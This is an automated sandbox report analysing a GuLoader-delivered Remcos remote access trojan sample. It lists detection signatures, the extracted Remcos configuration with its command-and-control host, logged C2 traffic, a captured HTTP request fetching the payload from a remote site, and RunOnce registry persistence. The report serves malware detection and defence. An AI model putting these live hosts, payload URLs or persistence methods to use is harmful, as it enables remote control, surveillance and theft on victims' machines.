Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
KO0q4biYfC.exe

Overview

General Information

Sample name:KO0q4biYfC.exe
renamed because original name is a hash value
Original sample name:03fe92bf84effb45dfb4c47da5704f0b35c3ca3b562ac2f46c1da51a8829eb5e.exe
Analysis ID:1585953
MD5:dd935b0e91e2e551b21296d8fa186d11
SHA1:9638372c80f866bdc1b73af7971918e8ba7ab9e7
SHA256:03fe92bf84effb45dfb4c47da5704f0b35c3ca3b562ac2f46c1da51a8829eb5e
Tags:exeuser-adrian__luca
Infos:

Detection

Remcos, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected Remcos RAT
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected GuLoader
Yara detected Remcos RAT
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Creates autostart registry keys with suspicious values (likely registry only malware)
Drops PE files with a suspicious file extension
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: New RUN Key Pointing to Suspicious Folder
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Abnormal high CPU Usage
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: SCR File Write Event
Sigma detected: Suspicious Screensaver Binary File Creation
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication

Classification

  • System is w10x64
  • KO0q4biYfC.exe (PID: 7000 cmdline: "C:\Users\user\Desktop\KO0q4biYfC.exe" MD5: DD935B0E91E2E551B21296D8FA186D11)
    • KO0q4biYfC.exe (PID: 6596 cmdline: "C:\Users\user\Desktop\KO0q4biYfC.exe" MD5: DD935B0E91E2E551B21296D8FA186D11)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
{"Host:Port:Password": ["newkezfill.site:2404:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-B0AIE8", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
SourceRuleDescriptionAuthorStrings
00000008.00000002.3700510046.0000000006B28000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
    00000008.00000002.3700597027.0000000006B54000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      00000000.00000002.1350132255.000000000560C000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
        Process Memory Space: KO0q4biYfC.exe PID: 6596JoeSecurity_RemcosYara detected Remcos RATJoe Security

          System Summary

          barindex
          Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user\AppData\Local\Temp\avaliable\Plderer180.scr, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\KO0q4biYfC.exe, ProcessId: 6596, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\hulske
          Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\Temp\avaliable\Plderer180.scr, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\KO0q4biYfC.exe, ProcessId: 6596, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\hulske
          Source: File createdAuthor: Christopher Peacock @securepeacock, SCYTHE @scythe_io: Data: EventID: 11, Image: C:\Users\user\Desktop\KO0q4biYfC.exe, ProcessId: 6596, TargetFilename: C:\Users\user\AppData\Local\Temp\avaliable\Plderer180.scr
          Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Users\user\Desktop\KO0q4biYfC.exe, ProcessId: 6596, TargetFilename: C:\Users\user\AppData\Local\Temp\avaliable\Plderer180.scr

          Stealing of Sensitive Information

          barindex
          Source: Registry Key setAuthor: Joe Security: Data: Details: 5B 2E 20 9B 00 B7 D9 5E 93 3D 75 DB D2 20 EF 4D CB C6 B0 94 A1 D0 92 96 F7 16 66 22 EA 42 4C 69 DB CD 8C 5C 45 7A 1F F6 B7 B3 4C 9D F9 D0 F3 01 5B 0E 8C 3C 06 4F 3E 29 B9 60 DE 22 6F AD A7 78 FC 09 31 1B C4 49 58 1B AD FD 2E FC 90 BA 9A D7 E6 18 39 76 , EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\KO0q4biYfC.exe, ProcessId: 6596, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Rmc-B0AIE8\exepath
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2025-01-08T15:07:57.807858+010020365941Malware Command and Control Activity Detected192.168.2.74997987.120.84.232404TCP
          2025-01-08T15:08:57.740105+010020365941Malware Command and Control Activity Detected192.168.2.74983087.120.84.232404TCP
          2025-01-08T15:09:20.148425+010020365941Malware Command and Control Activity Detected192.168.2.74996987.120.84.232404TCP
          2025-01-08T15:09:42.537707+010020365941Malware Command and Control Activity Detected192.168.2.74997287.120.84.232404TCP
          2025-01-08T15:10:04.942338+010020365941Malware Command and Control Activity Detected192.168.2.74997387.120.84.232404TCP
          2025-01-08T15:10:27.348794+010020365941Malware Command and Control Activity Detected192.168.2.74997487.120.84.232404TCP
          2025-01-08T15:10:49.740018+010020365941Malware Command and Control Activity Detected192.168.2.74997587.120.84.232404TCP
          2025-01-08T15:11:12.134329+010020365941Malware Command and Control Activity Detected192.168.2.74997687.120.84.232404TCP
          2025-01-08T15:11:34.522128+010020365941Malware Command and Control Activity Detected192.168.2.74997787.120.84.232404TCP
          2025-01-08T15:11:56.881424+010020365941Malware Command and Control Activity Detected192.168.2.74997887.120.84.232404TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2025-01-08T15:08:32.533594+010028032702Potentially Bad Traffic192.168.2.749794164.160.91.32443TCP

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: 00000008.00000002.3700510046.0000000006B28000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": ["newkezfill.site:2404:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-B0AIE8", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
          Source: C:\Users\user\AppData\Local\Temp\avaliable\Plderer180.scrReversingLabs: Detection: 42%
          Source: KO0q4biYfC.exeReversingLabs: Detection: 42%
          Source: KO0q4biYfC.exeVirustotal: Detection: 52%Perma Link
          Source: Yara matchFile source: 00000008.00000002.3700510046.0000000006B28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.3700597027.0000000006B54000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: KO0q4biYfC.exe PID: 6596, type: MEMORYSTR
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
          Source: C:\Users\user\AppData\Local\Temp\avaliable\Plderer180.scrJoe Sandbox ML: detected
          Source: KO0q4biYfC.exeJoe Sandbox ML: detected
          Source: KO0q4biYfC.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: unknownHTTPS traffic detected: 164.160.91.32:443 -> 192.168.2.7:49794 version: TLS 1.2
          Source: KO0q4biYfC.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: C:\Users\user\Desktop\KO0q4biYfC.exeCode function: 0_2_0040672B FindFirstFileW,FindClose,0_2_0040672B
          Source: C:\Users\user\Desktop\KO0q4biYfC.exeCode function: 0_2_00405AFA CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,LdrInitializeThunk,FindNextFileW,FindClose,0_2_00405AFA
          Source: C:\Users\user\Desktop\KO0q4biYfC.exeCode function: 0_2_00402868 FindFirstFileW,0_2_00402868
          Source: C:\Users\user\Desktop\KO0q4biYfC.exeCode function: 8_2_00402868 FindFirstFileW,8_2_00402868
          Source: C:\Users\user\Desktop\KO0q4biYfC.exeCode function: 8_2_0040672B FindFirstFileW,FindClose,8_2_0040672B
          Source: C:\Users\user\Desktop\KO0q4biYfC.exeCode function: 8_2_00405AFA CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,LdrInitializeThunk,FindNextFileW,FindClose,8_2_00405AFA

          Networking

          barindex
          Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.7:49830 -> 87.120.84.23:2404
          Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.7:49972 -> 87.120.84.23:2404
          Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.7:49976 -> 87.120.84.23:2404
          Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.7:49974 -> 87.120.84.23:2404
          Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.7:49975 -> 87.120.84.23:2404
          Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.7:49969 -> 87.120.84.23:2404
          Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.7:49977 -> 87.120.84.23:2404
          Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.7:49973 -> 87.120.84.23:2404
          Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.7:49978 -> 87.120.84.23:2404
          Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.7:49979 -> 87.120.84.23:2404
          Source: Malware configuration extractorURLs: newkezfill.site
          Source: global trafficTCP traffic: 192.168.2.7:49830 -> 87.120.84.23:2404
          Source: Joe Sandbox ViewASN Name: SHARCOM-ASBG SHARCOM-ASBG
          Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
          Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:49794 -> 164.160.91.32:443
          Source: global trafficHTTP traffic detected: GET /PLBVeySxbfKXMM176.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: www.healthselflesssupplies.co.zaCache-Control: no-cache
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: global trafficHTTP traffic detected: GET /PLBVeySxbfKXMM176.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: www.healthselflesssupplies.co.zaCache-Control: no-cache
          Source: global trafficDNS traffic detected: DNS query: www.healthselflesssupplies.co.za
          Source: global trafficDNS traffic detected: DNS query: newkezfill.site
          Source: KO0q4biYfC.exe, Plderer180.scr.8.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: KO0q4biYfC.exe, 00000008.00000002.3700510046.0000000006B28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.healthselflesssupplies.co.za/
          Source: KO0q4biYfC.exe, 00000008.00000002.3700783468.00000000086F0000.00000004.00001000.00020000.00000000.sdmp, KO0q4biYfC.exe, 00000008.00000002.3700510046.0000000006AE8000.00000004.00000020.00020000.00000000.sdmp, KO0q4biYfC.exe, 00000008.00000002.3700510046.0000000006B28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.healthselflesssupplies.co.za/PLBVeySxbfKXMM176.bin
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
          Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
          Source: unknownHTTPS traffic detected: 164.160.91.32:443 -> 192.168.2.7:49794 version: TLS 1.2
          Source: C:\Users\user\Desktop\KO0q4biYfC.exeCode function: 0_2_0040558F GetDlgItem,GetDlgItem,GetDlgItem,LdrInitializeThunk,GetDlgItem,LdrInitializeThunk,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,LdrInitializeThunk,ShowWindow,LdrInitializeThunk,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,LdrInitializeThunk,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,LdrInitializeThunk,ShowWindow,LdrInitializeThunk,LdrInitializeThunk,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,LdrInitializeThunk,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_0040558F

          E-Banking Fraud

          barindex
          Source: Yara matchFile source: 00000008.00000002.3700510046.0000000006B28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.3700597027.0000000006B54000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: KO0q4biYfC.exe PID: 6596, type: MEMORYSTR
          Source: C:\Users\user\Desktop\KO0q4biYfC.exeProcess Stats: CPU usage > 49%
          Source: C:\Users\user\Desktop\KO0q4biYfC.exeCode function: 0_2_004034A5 EntryPoint,LdrInitializeThunk,SetErrorMode,GetVersion,lstrlenA,LdrInitializeThunk,#17,OleInitialize,LdrInitializeThunk,SHGetFileInfoW,GetCommandLineW,CharNextW,LdrInitializeThunk,GetTempPathW,LdrInitializeThunk,GetTempPathW,GetWindowsDirectoryW,lstrcatW,LdrInitializeThunk,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,LdrInitializeThunk,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,LdrInitializeThunk,ExitWindowsEx,ExitProcess,0_2_004034A5
          Source: C:\Users\user\Desktop\KO0q4biYfC.exeCode function: 8_2_004034A5 EntryPoint,LdrInitializeThunk,SetErrorMode,GetVersion,lstrlenA,LdrInitializeThunk,#17,OleInitialize,LdrInitializeThunk,SHGetFileInfoW,GetCommandLineW,CharNextW,LdrInitializeThunk,GetTempPathW,LdrInitializeThunk,GetTempPathW,GetWindowsDirectoryW,lstrcatW,LdrInitializeThunk,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,LdrInitializeThunk,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,LdrInitializeThunk,ExitWindowsEx,ExitProcess,8_2_004034A5
          Source: C:\Users\user\Desktop\KO0q4biYfC.exeCode function: 0_2_00404DCC0_2_00404DCC
          Source: C:\Users\user\Desktop\KO0q4biYfC.exeCode function: 0_2_00406AF20_2_00406AF2
          Source: C:\Users\user\Desktop\KO0q4biYfC.exeCode function: 0_2_73C61B5F0_2_73C61B5F
          Source: C:\Users\user\Desktop\KO0q4biYfC.exeCode function: 8_2_00404DCC8_2_00404DCC
          Source: C:\Users\user\Desktop\KO0q4biYfC.exeCode function: 8_2_00406AF28_2_00406AF2
          Source: C:\Users\user\Desktop\KO0q4biYfC.exeCode function: String function: 00402C41 appears 49 times
          Source: KO0q4biYfC.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: classification engineClassification label: mal100.troj.evad.winEXE@3/11@2/2
          Source: C:\Users\user\Desktop\KO0q4biYfC.exeCode function: 0_2_004034A5 EntryPoint,LdrInitializeThunk,SetErrorMode,GetVersion,lstrlenA,LdrInitializeThunk,#17,OleInitialize,LdrInitializeThunk,SHGetFileInfoW,GetCommandLineW,CharNextW,LdrInitializeThunk,GetTempPathW,LdrInitializeThunk,GetTempPathW,GetWindowsDirectoryW,lstrcatW,LdrInitializeThunk,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,LdrInitializeThunk,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,LdrInitializeThunk,ExitWindowsEx,ExitProcess,0_2_004034A5
          Source: C:\Users\user\Desktop\KO0q4biYfC.exeCode function: 8_2_004034A5 EntryPoint,LdrInitializeThunk,SetErrorMode,GetVersion,lstrlenA,LdrInitializeThunk,#17,OleInitialize,LdrInitializeThunk,SHGetFileInfoW,GetCommandLineW,CharNextW,LdrInitializeThunk,GetTempPathW,LdrInitializeThunk,GetTempPathW,GetWindowsDirectoryW,lstrcatW,LdrInitializeThunk,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,LdrInitializeThunk,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,LdrInitializeThunk,ExitWindowsEx,ExitProcess,8_2_004034A5
          Source: C:\Users\user\Desktop\KO0q4biYfC.exeCode function: 0_2_00404850 GetDlgItem,SetWindowTextW,LdrInitializeThunk,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,LdrInitializeThunk,MulDiv,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,SetDlgItemTextW,0_2_00404850
          Source: C:\Users\user\Desktop\KO0q4biYfC.exeCode function: 0_2_00402104 LdrInitializeThunk,CoCreateInstance,LdrInitializeThunk,LdrInitializeThunk,0_2_00402104
          Source: C:\Users\user\Desktop\KO0q4biYfC.exeFile created: C:\Users\user\AppData\Roaming\brugserJump to behavior
          Source: C:\Users\user\Desktop\KO0q4biYfC.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-B0AIE8
          Source: C:\Users\user\Desktop\KO0q4biYfC.exeFile created: C:\Users\user~1\AppData\Local\Temp\nsv399F.tmpJump to behavior
          Source: KO0q4biYfC.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\KO0q4biYfC.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\KO0q4biYfC.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: KO0q4biYfC.exeReversingLabs: Detection: 42%
          Source: KO0q4biYfC.exeVirustotal: Detection: 52%
          Source: C:\Users\user\Desktop\KO0q4biYfC.exeFile read: C:\Users\user\Desktop\KO0q4biYfC.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\KO0q4biYfC.exe "C:\Users\user\Desktop\KO0q4biYfC.exe"
          Source: C:\Users\user\Desktop\KO0q4biYfC.exeProcess created: C:\Users\user\Desktop\KO0q4biYfC.exe "C:\Users\user\Desktop\KO0q4biYfC.exe"
          Source: C:\Users\user\Desktop\KO0q4biYfC.exeProcess created: C:\Users\user\Desktop\KO0q4biYfC.exe "C:\Users\user\Desktop\KO0q4biYfC.exe"Jump to behavior
          Source: C:\Users\user\Desktop\KO0q4biYfC.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\KO0q4biYfC.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\Desktop\KO0q4biYfC.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\Desktop\KO0q4biYfC.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Users\user\Desktop\KO0q4biYfC.exeSection loaded: dwmapi.dllJump to behavior
          Source: C:\Users\user\Desktop\KO0q4biYfC.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\Desktop\KO0q4biYfC.exeSection loaded: oleacc.dllJump to behavior
          Source: C:\Users\user\Desktop\KO0q4biYfC.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Users\user\Desktop\KO0q4biYfC.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\KO0q4biYfC.exeSection loaded: shfolder.dllJump to behavior
          Source: C:\Users\user\Desktop\KO0q4biYfC.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\KO0q4biYfC.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\KO0q4biYfC.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\KO0q4biYfC.exeSection loaded: riched20.dllJump to behavior
          Source: C:\Users\user\Desktop\KO0q4biYfC.exeSection loaded: usp10.dllJump to behavior
          Source: C:\Users\user\Desktop\KO0q4biYfC.exeSection loaded: msls31.dllJump to behavior
          Source: C:\Users\user\Desktop\KO0q4biYfC.exeSection loaded: textinputframework.dllJump to behavior
          Source: C:\Users\user\Desktop\KO0q4biYfC.exeSection loaded: coreuicomponents.dllJump to behavior
          Source: C:\Users\user\Desktop\KO0q4biYfC.exeSection loaded: coremessaging.dllJump to behavior
          Source: C:\Users\user\Desktop\KO0q4biYfC.exeSection loaded: coremessaging.dllJump to behavior
          Source: C:\Users\user\Desktop\KO0q4biYfC.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\KO0q4biYfC.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\KO0q4biYfC.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\KO0q4biYfC.exeSection loaded: textshaping.dllJump to behavior
          Source: C:\Users\user\Desktop\KO0q4biYfC.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\Desktop\KO0q4biYfC.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\KO0q4biYfC.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\KO0q4biYfC.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\KO0q4biYfC.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\KO0q4biYfC.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Users\user\Desktop\KO0q4biYfC.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Users\user\Desktop\KO0q4biYfC.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\Desktop\KO0q4biYfC.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\Desktop\KO0q4biYfC.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\KO0q4biYfC.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Users\user\Desktop\KO0q4biYfC.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Users\user\Desktop\KO0q4biYfC.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\KO0q4biYfC.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Users\user\Desktop\KO0q4biYfC.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Users\user\Desktop\KO0q4biYfC.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Users\user\Desktop\KO0q4biYfC.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Users\user\Desktop\KO0q4biYfC.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Users\user\Desktop\KO0q4biYfC.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Users\user\Desktop\KO0q4biYfC.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Users\user\Desktop\KO0q4biYfC.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Users\user\Desktop\KO0q4biYfC.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Users\user\Desktop\KO0q4biYfC.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\KO0q4biYfC.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\KO0q4biYfC.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\KO0q4biYfC.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\user\Desktop\KO0q4biYfC.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Users\user\Desktop\KO0q4biYfC.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\Desktop\KO0q4biYfC.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\KO0q4biYfC.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Users\user\Desktop\KO0q4biYfC.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Users\user\Desktop\KO0q4biYfC.exeSection loaded: winmm.dllJump to behavior
          Source: C:\Users\user\Desktop\KO0q4biYfC.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
          Source: skovmandshilsnerne.lnk.0.drLNK file: ..\..\..\..\..\..\..\Windows\punktnedslagenes\Suspired157.Ege
          Source: C:\Users\user\Desktop\KO0q4biYfC.exeFile written: C:\Users\user\AppData\Local\Temp\tmc.iniJump to behavior
          Source: KO0q4biYfC.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

          Data Obfuscation

          barindex
          Source: Yara matchFile source: 00000000.00000002.1350132255.000000000560C000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
